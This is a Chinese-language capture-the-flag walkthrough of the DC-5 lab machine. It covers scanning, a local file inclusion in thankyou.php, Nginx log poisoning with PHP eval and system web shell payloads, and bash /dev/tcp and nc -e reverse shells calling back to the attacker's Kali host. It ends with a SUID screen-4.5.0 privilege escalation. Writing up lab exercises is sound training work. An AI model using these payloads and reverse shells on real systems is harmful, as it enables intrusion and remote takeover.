I"[<h3 id="主机识别">主机识别</h3>

<p><code class="language-plaintext highlighter-rouge">arp-scan -l</code></p>

<h3 id="网络拓扑">网络拓扑</h3>

<table>
  <thead>
    <tr>
      <th>计算机</th>
      <th>IP</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>本机（Win10）</td>
      <td><code class="language-plaintext highlighter-rouge">192.168.1.105</code></td>
    </tr>
    <tr>
      <td>Kali</td>
      <td><code class="language-plaintext highlighter-rouge">192.168.1.112</code></td>
    </tr>
    <tr>
      <td>DC-5</td>
      <td><code class="language-plaintext highlighter-rouge">192.168.1.107</code></td>
    </tr>
  </tbody>
</table>

<h3 id="扫描端口和版本信息">扫描端口和版本信息</h3>

<p><code class="language-plaintext highlighter-rouge">nmap -A 192.168.1.107</code></p>

<p><img src="https://i.loli.net/2020/05/16/caVTl329ibP4SYu.png" alt="1.png" /></p>

<h3 id="访问-web-并确定-web-应用">访问 Web 并确定 Web 应用</h3>

<p>根据 Nmap 扫描结果可知，Web 应用程序运行的是 <strong>Nginx</strong> 代理服务器，以及它的版本号：<strong>1.6.2</strong></p>

<p><img src="https://i.loli.net/2020/05/16/yofWsV3dRU54qe1.png" alt="2.png" /></p>

<p>经过 OSINT，发现该版本的漏洞不多。虽然没有让人兴奋的 RCE，但是却发现一个本地提权漏洞（从<a href="https://vuldb.com/?id.93109">这篇文章</a>知道是 Nginx 日志文件导致的提权漏洞），我们将它作为候补方案</p>

<p><img src="https://i.loli.net/2020/05/16/lJ6YoSZqhnCGjI1.png" alt="13.png" /></p>

<p>除了自己收集的信息之外，出题人也给了我们明确的信息：</p>

<pre><code class="line-numbers">You need to look for something a little out of the ordinary (something that changes with a refresh of a page).
</code></pre>

<p>经过使用 BP 的高级功能 <strong>Content Discovery</strong> 发现 <code class="language-plaintext highlighter-rouge">footer.php</code> 页面内容会改变，想必这就是作者提到的刷新会改变的页面，因此可以确定突破口就在这里</p>

<p><img src="https://i.loli.net/2020/05/16/kQKL7xwPlmUqf4r.png" alt="5.png" /></p>

<p>经过测试后发现页面返回的内容就几个，猜测是有随机值或者存在固定的数组元素</p>

<p><img src="https://i.loli.net/2020/05/16/SZMD2tQ6TB5NA3K.png" alt="3.png" /></p>

<p>后来查看 <code class="language-plaintext highlighter-rouge">thankyou.php</code> 页面源码发现包含 <code class="language-plaintext highlighter-rouge">footer.php</code>页面。不过进行到这里卡了一段时间，实在没头绪就想到用 <a href="https://github.com/s0md3v/Arjun">Arjun</a> 工具来试试测试 HTTP 请求参数</p>

<p><img src="https://i.loli.net/2020/05/16/W4rqVPCHAR6dXk9.png" alt="4.png" /></p>

<p>结果是让人兴奋的，至少这次成功了（之前测试其他的页面啥都没有 ¯(°_o)/¯）。不过一看到参数的名字就立刻想到 <strong>LFI</strong>，因此把它丢到 <strong>Intruder</strong>，暴力读一下文件</p>

<blockquote>
  <p>使用 SecLists 项目的 <code class="language-plaintext highlighter-rouge">Fuzzing\LFI\LFI-Jhaddix.txt</code> 字典</p>
</blockquote>

<p><img src="https://i.loli.net/2020/05/16/bXLuDVjoMOlfF1K.png" alt="6.png" /></p>

<p>返回结果有很多，可以使用 BP 的过滤功能过滤掉没有返回内容的响应包</p>

<blockquote>
  <p>没有返回内容的响应包内容长度都是 <strong>835</strong>，因此在过滤框中填入 <code class="language-plaintext highlighter-rouge">Content-Length: 835</code> 进行过滤，又因为我们需要反向选择，勾选 <strong>Negative search</strong> 选项，这样过滤后的结果就是有返回内容的响应包</p>
</blockquote>

<p><img src="https://i.loli.net/2020/05/16/NTfLmP5eVpEryJQ.png" alt="7.png" /></p>

<p>当然我们也可以修改 <code class="language-plaintext highlighter-rouge">file</code> 参数值为 <code class="language-plaintext highlighter-rouge">php://filter/convert.base64-encode/resource=footer.php</code> 来查看 <code class="language-plaintext highlighter-rouge">footer.php</code> 文件内容</p>

<pre><code class="language-php line-numbers">&lt;?php    
//Random Gen Test    
$rndmYears = array(
    "Copyright © 2017", "Copyright © 2018", "Copyright © 2019",  "Copyright © 2020"  );    
echo $rndmYears[mt_rand(0, count($rndmYears)-1)];    
?&gt;
</code></pre>

<p>因此这里我们就可以使用之前收集到的信息读取 Nginx 的日志文件</p>

<p><img src="https://i.loli.net/2020/05/16/Z3TNuletUKrbBEj.png" alt="9.png" /></p>

<p><img src="https://i.loli.net/2020/05/16/QkcH1h6Zyig8RUM.png" alt="8.png" /></p>

<h3 id="getshell">Getshell</h3>

<p>经过测试，我们知道 Nginx 会将请求的内容保存在日志文件，这样我们可以进行 getshell ，因此在 BP 上修改请求字段：<code class="language-plaintext highlighter-rouge">GET /thankyou.php?file=&lt;?php @eval($_POST["sh"]);?&gt; HTTP/1.1</code> 并提交。</p>

<p>之后使用 <a href="https://github.com/AntSwordProject/antSword">蚁剑</a> 连接上之后再远程连接 Kali</p>

<p><code class="language-plaintext highlighter-rouge">bash -c "bash -i &gt;&amp; /dev/tcp/192.168.1.112/6677 0&gt;&amp;1"</code></p>

<h3 id="提权">提权</h3>

<p>后面的步骤一如既往，上传 <code class="language-plaintext highlighter-rouge">LinEnum.sh</code> 脚本到虚拟机 <code class="language-plaintext highlighter-rouge">/tmp</code> 目录下执行。注意到 <code class="language-plaintext highlighter-rouge">/bin/screen-4.5.0</code> 具有 <strong>SUID</strong> 权限</p>

<p><img src="https://i.loli.net/2020/05/16/acR4UgBnHoL2u7i.png" alt="10.png" /></p>

<p>查找该工具的漏洞</p>

<p><img src="https://i.loli.net/2020/05/16/vVWnaTNeUM1G5kX.png" alt="11.png" /></p>

<p>结果是好的，我们可以进行本地提权。不过这里我们直接将脚本上传运行会有些问题，既然 shell 脚本自动化执行有点问题，那就根据脚本内容手动一步步执行就可以了</p>

<p><img src="https://i.loli.net/2020/05/16/IpZ48KcAVYE69xT.png" alt="12.png" /></p>

<h3 id="总结">总结</h3>

<p>1 . 走投无路时试试测试 HTTP 查询参数，也可以使用 Kali 自带的 wfuzz 工具</p>

<p>2 . Getshell 时，可以试试</p>

<p><code class="language-plaintext highlighter-rouge">GET /thankyou.php?file=&lt;?php system($_GET['cmd']); ?&gt; HTTP/1.1</code></p>

<p>后续访问执行命令再加上 <code class="language-plaintext highlighter-rouge">cmd</code> 参数即可，比如：</p>

<p><code class="language-plaintext highlighter-rouge">http://192.168.1.107/thankyou.php?file=/var/log/nginx/error.log&amp;cmd=nc%20192.168.1.112%206677%20-e%20/bin/bash</code></p>

<p>3 . BP 过滤选项不仅可以根据选择的内容过滤，也可以根据状态码过滤：<code class="language-plaintext highlighter-rouge">status":"404</code></p>
:ET